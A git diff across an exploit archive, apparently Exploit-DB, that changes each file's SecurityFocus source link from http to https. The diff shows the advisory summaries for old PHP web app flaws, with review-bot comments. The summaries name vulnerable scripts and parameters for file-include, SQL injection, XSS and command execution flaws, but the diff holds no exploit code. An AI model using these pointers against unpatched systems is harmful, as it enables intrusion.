queries. The source of this issue is insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/23486.txt b/exploits/php/webapps/23486.txt index c697b9694..06cdd391e 100644 --- a/exploits/php/webapps/23486.txt +++ b/exploits/php/webapps/23486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9308/info +source: https://www.securityfocus.com/bid/9308/info Private Message System is prone to a cross-site scripting vulnerability. This issue may be exploited by creating a malicious link to a site hosting the software with hostile HTML and script code embedded in URI parameters. If the link is followed, the attacker-supplied code may be rendered in the victim user's browser. diff --git a/exploits/php/webapps/23487.txt b/exploits/php/webapps/23487.txt index 45334d164..f885313fd 100644 
--- a/exploits/php/webapps/23487.txt +++ b/exploits/php/webapps/23487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9309/info +source: https://www.securityfocus.com/bid/9309/info It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell metacharacters via the 'count' parameter of php-ping.php script. diff --git a/exploits/php/webapps/23507.txt b/exploits/php/webapps/23507.txt index 5ac73a7c1..5cd776479 100644 --- a/exploits/php/webapps/23507.txt +++ b/exploits/php/webapps/23507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9338/info +source: https://www.securityfocus.com/bid/9338/info EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. diff --git a/exploits/php/webapps/23513.txt b/exploits/php/webapps/23513.txt index cbdf7965a..4100bb77a 100644 --- a/exploits/php/webapps/23513.txt +++ b/exploits/php/webapps/23513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9349/info +source: https://www.securityfocus.com/bid/9349/info A problem has been reported in the handling of user-supplied input by the Athena Web Registration scripts. Because of this, it may be possible for an attacker to gain unauthorized access to a vulnerable system. diff --git a/exploits/php/webapps/23517.txt b/exploits/php/webapps/23517.txt index c5356031c..1ec4f481f 100644 --- a/exploits/php/webapps/23517.txt +++ b/exploits/php/webapps/23517.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9357/info +source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software. diff --git a/exploits/php/webapps/23518.txt b/exploits/php/webapps/23518.txt index 5b803ea02..a8fb4ae9e 100644 --- a/exploits/php/webapps/23518.txt +++ b/exploits/php/webapps/23518.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9357/info +source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software. diff --git a/exploits/php/webapps/23519.txt b/exploits/php/webapps/23519.txt index b742d5176..d5a280c8b 100644 --- a/exploits/php/webapps/23519.txt +++ b/exploits/php/webapps/23519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9359/info +source: https://www.securityfocus.com/bid/9359/info FreznoShop is prone to a cross-site scripting vulnerability. Remote attackers may create malicious links to the software that include hostile HTML and script code. If such a link was followed by a victim user, the attacker-supplied code would be rendered in the security context of the site hosting the software. diff --git a/exploits/php/webapps/23520.txt b/exploits/php/webapps/23520.txt index ad364e107..a024675cc 100644 --- a/exploits/php/webapps/23520.txt +++ b/exploits/php/webapps/23520.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9368/info +source: https://www.securityfocus.com/bid/9368/info PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require() paths for various external files. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software. diff --git a/exploits/php/webapps/23525.txt b/exploits/php/webapps/23525.txt index 6f066a461..062a88659 100644 --- a/exploits/php/webapps/23525.txt +++ b/exploits/php/webapps/23525.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9369/info +source: https://www.securityfocus.com/bid/9369/info PhpGedView is prone to a cross-site scripting vulnerability. Remote attackers may create malicious links to this script that include hostile HTML and script code. If such a link was followed by a victim user, the attacker-supplied code would be rendered in the security context of the site hosting the software. diff --git a/exploits/php/webapps/23526.txt b/exploits/php/webapps/23526.txt index 9b4153bef..5fec9c7b5 100644 --- a/exploits/php/webapps/23526.txt +++ b/exploits/php/webapps/23526.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9371/info +source: https://www.securityfocus.com/bid/9371/info PhpGedView allows remote users to access information displayed by the phpinfo() function. This may disclose sensitive information about the environment the software runs in. diff --git a/exploits/php/webapps/23536.txt b/exploits/php/webapps/23536.txt index a3ae5755d..239bb10e9 100644 --- a/exploits/php/webapps/23536.txt +++ b/exploits/php/webapps/23536.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9395/info +source: https://www.securityfocus.com/bid/9395/info A problem in the handling of user-supplied input by Andy's PHP Projects Man Page Lookup script has been reported. Because of this, it is possible for an attacker to gain unauthorized access to sensitive information on a system. diff --git a/exploits/php/webapps/23537.txt b/exploits/php/webapps/23537.txt index 0f3ae8741..e5ac041d8 100644 --- a/exploits/php/webapps/23537.txt +++ b/exploits/php/webapps/23537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9396/info +source: https://www.securityfocus.com/bid/9396/info A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems. diff --git a/exploits/php/webapps/23546.txt b/exploits/php/webapps/23546.txt index 7fc99879d..a7ad1cd52 100644 --- a/exploits/php/webapps/23546.txt +++ b/exploits/php/webapps/23546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9437/info +source: https://www.securityfocus.com/bid/9437/info Multiple vulnerabilities have been reported to exist in the software that may allow an attacker to carry out attacks against the database, disclose sensitive information, and execute HTML or script code in a user's browser. The issues include SQL injection, cross-site scripting, HTML injection, and information disclosure. diff --git a/exploits/php/webapps/23553.php b/exploits/php/webapps/23553.php index cf976fd71..f3628799d 100644 --- a/exploits/php/webapps/23553.php +++ b/exploits/php/webapps/23553.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9445/info +source: https://www.securityfocus.com/bid/9445/info It has been reported that Mambo Open Source may be prone to a remote file include vulnerability that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system. The issue exists because remote users may reportedly influence the include path for external scripts by supplying their own value for the 'mosConfig_absolute_path' variable in the 'mod_mainmenu.php' script. diff --git a/exploits/php/webapps/23554.java b/exploits/php/webapps/23554.java index 5964e0604..22f97f707 100644 --- a/exploits/php/webapps/23554.java +++ b/exploits/php/webapps/23554.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9449/info +source: https://www.securityfocus.com/bid/9449/info A problem with YaBB SE could make it possible for a remote user launch SQL injection attacks. diff --git a/exploits/php/webapps/23558.txt b/exploits/php/webapps/23558.txt index aed69444e..2c5b06b93 100644 --- a/exploits/php/webapps/23558.txt +++ b/exploits/php/webapps/23558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9458/info +source: https://www.securityfocus.com/bid/9458/info It has been reported that PHPix is vulnerable to a remote command execution vulnerability due to poor handling of externally supplied data such as shell metacharacters. This issue may allow unauthorized access to the affected system with the privileges of the web server hosting the vulnerable program. diff --git a/exploits/php/webapps/23599.txt b/exploits/php/webapps/23599.txt index 3b4336823..6a039891a 100644 --- a/exploits/php/webapps/23599.txt +++ b/exploits/php/webapps/23599.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9490/info +source: https://www.securityfocus.com/bid/9490/info It has been reported that Gallery is prone to a vulnerability that may allow a remote attacker to gain unauthorized access by overwriting various values for global variables. The issue occurs due to improper simulation of the behaviour of register_globals when the register_globals settings is disabled. It has been reported that register_globals functionality is simulated by extracting the values of the various $HTTP_ global variables into the global namespace. Due to improper sanitization of user-supplied data, an attacker may be able to overwrite the value of 'HTTP_POST_VARS' via the register_global simulation. Arbitrary PHP files may be included via the 'GALLERY_BASEDIR' parameter. diff --git a/exploits/php/webapps/23606.txt b/exploits/php/webapps/23606.txt index 001e75852..8205044e1 100644 --- a/exploits/php/webapps/23606.txt +++ b/exploits/php/webapps/23606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9497/info +source: https://www.securityfocus.com/bid/9497/info It has been reported that Xoops may be prone to a cross-site scripting vulnerability that may allow a remote user to execute HTML or script code in a user's browser. HTML and script code may be parsed via the 'topic_id' and 'forum' URI parameters of 'newbb/viewtopic.php' script. diff --git a/exploits/php/webapps/23607.txt b/exploits/php/webapps/23607.txt index cc227b983..f52bc2185 100644 --- a/exploits/php/webapps/23607.txt +++ b/exploits/php/webapps/23607.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9499/info +source: https://www.securityfocus.com/bid/9499/info A flaw exists in the Kietu 'index.php' script that may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file, which may result in execution of arbitrary commands with the privileges of the webserver process. diff --git a/exploits/php/webapps/23616.txt b/exploits/php/webapps/23616.txt index 0e972a7c0..541aad6c3 100644 --- a/exploits/php/webapps/23616.txt +++ b/exploits/php/webapps/23616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9529/info +source: https://www.securityfocus.com/bid/9529/info It has been reported that PhpGedView may be prone to a directory traversal vulnerability that may allow a remote attacker to access files outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data via the 'gedcom_config' parameter of the 'editconfig_gedcom.php' script. diff --git a/exploits/php/webapps/23617.txt b/exploits/php/webapps/23617.txt index 9e546a2e8..322f87756 100644 --- a/exploits/php/webapps/23617.txt +++ b/exploits/php/webapps/23617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9531/info +source: https://www.securityfocus.com/bid/9531/info It has been reported that PhpGedView may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. diff --git a/exploits/php/webapps/23618.txt b/exploits/php/webapps/23618.txt index bee8cc211..fb7966f87 100644 --- a/exploits/php/webapps/23618.txt +++ b/exploits/php/webapps/23618.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9535/info +source: https://www.securityfocus.com/bid/9535/info JBrowser has been reported to be vulnerable to directory traversal vulnerability that may allow a remote attacker to gain access to files readable by the web-server that reside outside of the server root directory. This issue is caused by insufficient sanitization of user specified directory paramemters issued to the 'browser.php' script. diff --git a/exploits/php/webapps/23619.txt b/exploits/php/webapps/23619.txt index 21d2f49e2..10098c3d7 100644 --- a/exploits/php/webapps/23619.txt +++ b/exploits/php/webapps/23619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9536/info +source: https://www.securityfocus.com/bid/9536/info It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/23620.txt b/exploits/php/webapps/23620.txt index 3f262850a..42b3f8910 100644 --- a/exploits/php/webapps/23620.txt +++ b/exploits/php/webapps/23620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9536/info +source: https://www.securityfocus.com/bid/9536/info It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/23621.txt b/exploits/php/webapps/23621.txt index b5cb29eab..a9c91df43 100644 --- a/exploits/php/webapps/23621.txt +++ b/exploits/php/webapps/23621.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9536/info +source: https://www.securityfocus.com/bid/9536/info It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/23628.txt b/exploits/php/webapps/23628.txt index 04a0d0d03..1992befc4 100644 --- a/exploits/php/webapps/23628.txt +++ b/exploits/php/webapps/23628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9537/info +source: https://www.securityfocus.com/bid/9537/info Due to a lack of access validation to the '_admin' directory, malevolent users may be able to execute arbitrary admin scripts. This may allow a malicious user to upload arbitrary files to the affected system and gain access to files outside of the web server root directory. There may also be other consequences associated with this vulnerability. diff --git a/exploits/php/webapps/23630.txt b/exploits/php/webapps/23630.txt index 499380bf4..71b95e353 100644 --- a/exploits/php/webapps/23630.txt +++ b/exploits/php/webapps/23630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9540/info +source: https://www.securityfocus.com/bid/9540/info Aprox Portal is prone to a vulnerability that may permit remote attackers to gain access to files that are readable by the hosting web server. These files may exist outside of the server root. diff --git a/exploits/php/webapps/23631.txt b/exploits/php/webapps/23631.txt index 5de3f980f..1fad96b46 100644 --- a/exploits/php/webapps/23631.txt +++ b/exploits/php/webapps/23631.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9544/info +source: https://www.securityfocus.com/bid/9544/info Multiple SQL injection vulnerabilities have been reported in various modules included in PHP-Nuke versions 6.9 and earlier. These issues could permit remote attackers to compromise PHP-Nuke administrative accounts. Other attacks may also be possible, such as gaining access to sensitive information. diff --git a/exploits/php/webapps/23636.txt b/exploits/php/webapps/23636.txt index 0c4fa990a..c4f1c8c5e 100644 --- a/exploits/php/webapps/23636.txt +++ b/exploits/php/webapps/23636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9560/info +source: https://www.securityfocus.com/bid/9560/info X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. diff --git a/exploits/php/webapps/23637.txt b/exploits/php/webapps/23637.txt index c6387d006..7a06b166c 100644 --- a/exploits/php/webapps/23637.txt +++ b/exploits/php/webapps/23637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9560/info +source: https://www.securityfocus.com/bid/9560/info X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. diff --git a/exploits/php/webapps/23639.txt b/exploits/php/webapps/23639.txt index 864822f55..1adb8e507 100644 --- a/exploits/php/webapps/23639.txt +++ b/exploits/php/webapps/23639.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9563/info +source: https://www.securityfocus.com/bid/9563/info X-Cart has been reported to be prone to an issue that may allow remote attackers to view any web server readable files on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. This issue has been reported to affect the 'auth.php' script. diff --git a/exploits/php/webapps/23640.txt b/exploits/php/webapps/23640.txt index 097942815..9e681b89c 100644 --- a/exploits/php/webapps/23640.txt +++ b/exploits/php/webapps/23640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9564/info +source: https://www.securityfocus.com/bid/9564/info phpMyAdmin is prone to a vulnerability that may permit remote attackers to gain access to files that are readable by the hosting web server. The issue is reported to exist in the 'export.php' script and may be exploited by providing directory traversal sequences as an argument for a specific URI parameter. diff --git a/exploits/php/webapps/23644.php b/exploits/php/webapps/23644.php index 5b3d2fc31..996048cde 100644 --- a/exploits/php/webapps/23644.php +++ b/exploits/php/webapps/23644.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9569/info +source: https://www.securityfocus.com/bid/9569/info Multiple vulnerabilities were reported in PHPX. The specific issues include cross-site scripting, HTML injection and account hijacking via specially crafted cookies. diff --git a/exploits/php/webapps/23645.txt b/exploits/php/webapps/23645.txt index 9fe3b1987..cd72646f0 100644 --- a/exploits/php/webapps/23645.txt +++ b/exploits/php/webapps/23645.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9574/info +source: https://www.securityfocus.com/bid/9574/info It has been reported that ReviewPost PHP Pro may be prone to multiple SQL injection vulnerabilities that may allow an attacker to influence SQL query logic. This issue could be exploited to disclose sensitive information that may be used to gain unauthorized access. An attacker may pass malicious data via the 'product' parameter of 'showproduct.php' script and the 'cat' parameter of 'showcat.php' script. diff --git a/exploits/php/webapps/23646.txt b/exploits/php/webapps/23646.txt index 23d0b01d1..a8d3e9a8a 100644 --- a/exploits/php/webapps/23646.txt +++ b/exploits/php/webapps/23646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9574/info +source: https://www.securityfocus.com/bid/9574/info It has been reported that ReviewPost PHP Pro may be prone to multiple SQL injection vulnerabilities that may allow an attacker to influence SQL query logic. This issue could be exploited to disclose sensitive information that may be used to gain unauthorized access. An attacker may pass malicious data via the 'product' parameter of 'showproduct.php' script and the 'cat' parameter of 'showcat.php' script. diff --git a/exploits/php/webapps/23653.txt b/exploits/php/webapps/23653.txt index 4b0ee81df..e2e3cb891 100644 --- a/exploits/php/webapps/23653.txt +++ b/exploits/php/webapps/23653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9584/info +source: https://www.securityfocus.com/bid/9584/info It has been reported that Discuz! is prone to an Cross Site Scripting vulnerability. This issue is caused by the application failing to properly sanitize links embedded within user messages. Upon successful exploitation of this issue, a malicious user could steal cookie based authentication credentials or other information within the context of the affected web page. 
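Review bot: In the hunks for 23645.txt and 23646.txt, both files end up with the same source line (bid/9574) and the same description, which names the 'product' parameter of 'showproduct.php' and the 'cat' parameter of 'showcat.php' together, so nothing in the visible header says which file documents which script. While line 1 is being touched, consider adding a one-line note to each file stating the script it covers. Separately, the context line in the 23653.txt hunk still reads "an Cross Site Scripting vulnerability"; "a cross-site scripting vulnerability" would match the wording used in the neighbouring headers.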
diff --git a/exploits/php/webapps/23657.txt b/exploits/php/webapps/23657.txt index 3ee42cf15..9b4ece8e6 100644 --- a/exploits/php/webapps/23657.txt +++ b/exploits/php/webapps/23657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9588/info +source: https://www.securityfocus.com/bid/9588/info It has been reported that Mambo Open Source may be prone to a cross-site scripting vulnerability that may allow a remote attacker to execute arbitrary HTML or script code in a user's browser. The issue exists in the 'Itemid' parameter of 'index.php' script. diff --git a/exploits/php/webapps/23663.txt b/exploits/php/webapps/23663.txt index f77de0eec..d3c7518dc 100644 --- a/exploits/php/webapps/23663.txt +++ b/exploits/php/webapps/23663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9605/info +source: https://www.securityfocus.com/bid/9605/info It has been reported that the PHP-Nuke module 'News' is prone to a cross-site scripting vulnerability. The issue arises due to the module failing to properly sanitize user-supplied information. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code. This would occur in the security context of the site hosting the software. diff --git a/exploits/php/webapps/23669.txt b/exploits/php/webapps/23669.txt index b293e263c..e2666859b 100644 --- a/exploits/php/webapps/23669.txt +++ b/exploits/php/webapps/23669.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9613/info +source: https://www.securityfocus.com/bid/9613/info It has been reported that the PHP-Nuke module 'Reviews' is prone to a cross-site scripting vulnerability. The issue arises due to the module failing to properly sanitize user-supplied information. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code. This would occur in the security context of the site hosting the software. diff --git a/exploits/php/webapps/23670.pl b/exploits/php/webapps/23670.pl index 93d5e5632..ea194d5fd 100755 --- a/exploits/php/webapps/23670.pl +++ b/exploits/php/webapps/23670.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9615/info +source: https://www.securityfocus.com/bid/9615/info It has been reported that the 'public message' feature of PHP-Nuke is vulnerable to an SQL injection vulnerability. The issue is due to improper sanitization of user-defined parameters supplied to the module. As a result, an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information. diff --git a/exploits/php/webapps/23680.php b/exploits/php/webapps/23680.php index 3fd0bcbd9..2061e8e85 100644 --- a/exploits/php/webapps/23680.php +++ b/exploits/php/webapps/23680.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9630/info +source: https://www.securityfocus.com/bid/9630/info It has been reported that PHPNuke may prone to a SQL injection vulnerability, due to insufficient sanitization user-supplied input. The problem is reported to exist in the $category variable contained within the 'index.php' page. diff --git a/exploits/php/webapps/23683.txt b/exploits/php/webapps/23683.txt index e63c2ce63..b09da239f 100644 --- a/exploits/php/webapps/23683.txt +++ b/exploits/php/webapps/23683.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9638/info +source: https://www.securityfocus.com/bid/9638/info It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules. diff --git a/exploits/php/webapps/23684.txt b/exploits/php/webapps/23684.txt index f8a00dcde..8a68c0d50 100644 --- a/exploits/php/webapps/23684.txt +++ b/exploits/php/webapps/23684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9638/info +source: https://www.securityfocus.com/bid/9638/info It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules. diff --git a/exploits/php/webapps/23685.txt b/exploits/php/webapps/23685.txt index 5a732b3bb..fbfd5df93 100644 --- a/exploits/php/webapps/23685.txt +++ b/exploits/php/webapps/23685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9639/info +source: https://www.securityfocus.com/bid/9639/info An SQL injection vulnerability has been reported to affect BosDates calendar system. The issue arises due to insufficient sanitization of user supplied data. As a result of this issue an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information. diff --git a/exploits/php/webapps/23687.txt b/exploits/php/webapps/23687.txt index bea098b64..5a8d07448 100644 --- a/exploits/php/webapps/23687.txt +++ b/exploits/php/webapps/23687.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9646/info +source: https://www.securityfocus.com/bid/9646/info A vulnerability has been reported in Macallan Mail Solution that may permit remote attackers to bypass authentication for the web interface. This may be exploited by submitting a specially crafted HTTP GET request for the administration page of the web interface. diff --git a/exploits/php/webapps/23688.txt b/exploits/php/webapps/23688.txt index 3b5f9ec0d..c69106c02 100644 --- a/exploits/php/webapps/23688.txt +++ b/exploits/php/webapps/23688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9649/info +source: https://www.securityfocus.com/bid/9649/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Upon successful exploitation, this issue may allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/php/webapps/23691.txt b/exploits/php/webapps/23691.txt index 350cd1607..89441ce0b 100644 --- a/exploits/php/webapps/23691.txt +++ b/exploits/php/webapps/23691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9656/info +source: https://www.securityfocus.com/bid/9656/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'search.php' script. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Successful exploitation of this issue may allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/php/webapps/23697.txt b/exploits/php/webapps/23697.txt index c76a8766b..9e22fb9b7 100644 --- a/exploits/php/webapps/23697.txt +++ b/exploits/php/webapps/23697.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9664/info +source: https://www.securityfocus.com/bid/9664/info Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. diff --git a/exploits/php/webapps/23698.txt b/exploits/php/webapps/23698.txt index 471b7177f..58c7c6266 100644 --- a/exploits/php/webapps/23698.txt +++ b/exploits/php/webapps/23698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9664/info +source: https://www.securityfocus.com/bid/9664/info Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. diff --git a/exploits/php/webapps/23699.txt b/exploits/php/webapps/23699.txt index 62ee17daa..306c6ba26 100644 --- a/exploits/php/webapps/23699.txt +++ b/exploits/php/webapps/23699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9664/info +source: https://www.securityfocus.com/bid/9664/info Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. diff --git a/exploits/php/webapps/23710.txt b/exploits/php/webapps/23710.txt index 641ffca1c..8d8c4b2e4 100644 --- a/exploits/php/webapps/23710.txt +++ b/exploits/php/webapps/23710.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9674/info +source: https://www.securityfocus.com/bid/9674/info It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software. 
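Review bot: Every hunk in this stretch, including the last one for 23710.txt, rewrites only line 1 (the "source:" line) of a four-line window, so the diff does not show whether any "http://www.securityfocus.com" links further down in these files were updated as well. Please confirm the replacement was run over whole files (a search for the old prefix under exploits/ should return nothing), or say in the commit message that only the header line is in scope, so the archive does not end up with mixed http and https references to the same advisory.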
diff --git a/exploits/php/webapps/23711.txt b/exploits/php/webapps/23711.txt index 6334c5586..5eedc28a4 100644 --- a/exploits/php/webapps/23711.txt +++ b/exploits/php/webapps/23711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9676/info +source: https://www.securityfocus.com/bid/9676/info Multiple vulnerabilities have been identified in the software due to improper sanitization of user-supplied input. Successful exploitation of these issues could allow an attacker to carry out cross-site scripting and SQL injection attacks via the 'id' parameter of 'more.php' script. diff --git a/exploits/php/webapps/23712.txt b/exploits/php/webapps/23712.txt index 3fca65084..1929f3ea5 100644 --- a/exploits/php/webapps/23712.txt +++ b/exploits/php/webapps/23712.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9676/info +source: https://www.securityfocus.com/bid/9676/info Multiple vulnerabilities have been identified in the software due to improper sanitization of user-supplied input. Successful exploitation of these issues could allow an attacker to carry out cross-site scripting and SQL injection attacks via the 'id' parameter of 'more.php' script. diff --git a/exploits/php/webapps/23718.txt b/exploits/php/webapps/23718.txt index ef449be3e..4a61093e9 100644 --- a/exploits/php/webapps/23718.txt +++ b/exploits/php/webapps/23718.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9687/info +source: https://www.securityfocus.com/bid/9687/info It has been reported that Online Store Kit is prone to multiple SQL injection vulnerabilities. These issues arise due to insufficient sanitation of user-supplied input via the URI. diff --git a/exploits/php/webapps/23719.txt b/exploits/php/webapps/23719.txt index 5ee33094e..81bdea81e 100644 --- a/exploits/php/webapps/23719.txt +++ b/exploits/php/webapps/23719.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9687/info +source: https://www.securityfocus.com/bid/9687/info It has been reported that Online Store Kit is prone to multiple SQL injection vulnerabilities. These issues arise due to insufficient sanitation of user-supplied input via the URI. diff --git a/exploits/php/webapps/23720.txt b/exploits/php/webapps/23720.txt index 96ff20d33..547e35b48 100644 --- a/exploits/php/webapps/23720.txt +++ b/exploits/php/webapps/23720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9687/info +source: https://www.securityfocus.com/bid/9687/info It has been reported that Online Store Kit is prone to multiple SQL injection vulnerabilities. These issues arise due to insufficient sanitation of user-supplied input via the URI. diff --git a/exploits/php/webapps/23722.txt b/exploits/php/webapps/23722.txt index fd734aa0e..c3c4fb1d0 100644 --- a/exploits/php/webapps/23722.txt +++ b/exploits/php/webapps/23722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23723.txt b/exploits/php/webapps/23723.txt index 2147ecfc6..11a814d4a 100644 --- a/exploits/php/webapps/23723.txt +++ b/exploits/php/webapps/23723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23724.txt b/exploits/php/webapps/23724.txt index 3d5e7db73..dad0f5015 100644 --- a/exploits/php/webapps/23724.txt +++ b/exploits/php/webapps/23724.txt 
